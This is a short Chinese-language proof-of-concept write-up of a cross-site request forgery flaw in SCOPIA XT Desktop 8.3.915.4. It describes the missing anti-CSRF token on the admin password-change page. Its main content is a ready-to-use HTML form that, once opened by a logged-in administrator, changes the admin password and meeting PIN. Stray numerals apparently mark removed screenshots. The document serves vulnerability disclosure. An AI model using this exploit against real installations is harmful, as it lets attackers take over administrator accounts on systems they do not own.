本 PoC 将描述如何利用 SCOPIA XT Desktop 8.3.915.4 版本上的跨站请求伪造(CSRF)漏洞。
网站:https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
跨站请求伪造,又称一键攻击或会话骑乘,缩写为 CSRF 或 XSRF,是一种恶意利用网站的方式,即从 Web 应用所信任的用户处传输未经授权的命令。
在“Directory and Authentication”页面中,管理员可以更改其密码。
使用 Burp Suite 捕获请求后,我发现并未实现反 CSRF 令牌,唯一的安全机制是会话 Cookie。
6
我创建了这个 HTML 文件,作为利用上述漏洞的 PoC。
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
在浏览器中运行该文件时,如果浏览器拥有 SCOPIA XT Desktop 管理环境的有效 Cookie,就可以将 admin 用户的密码更改为“attacker”:
4
5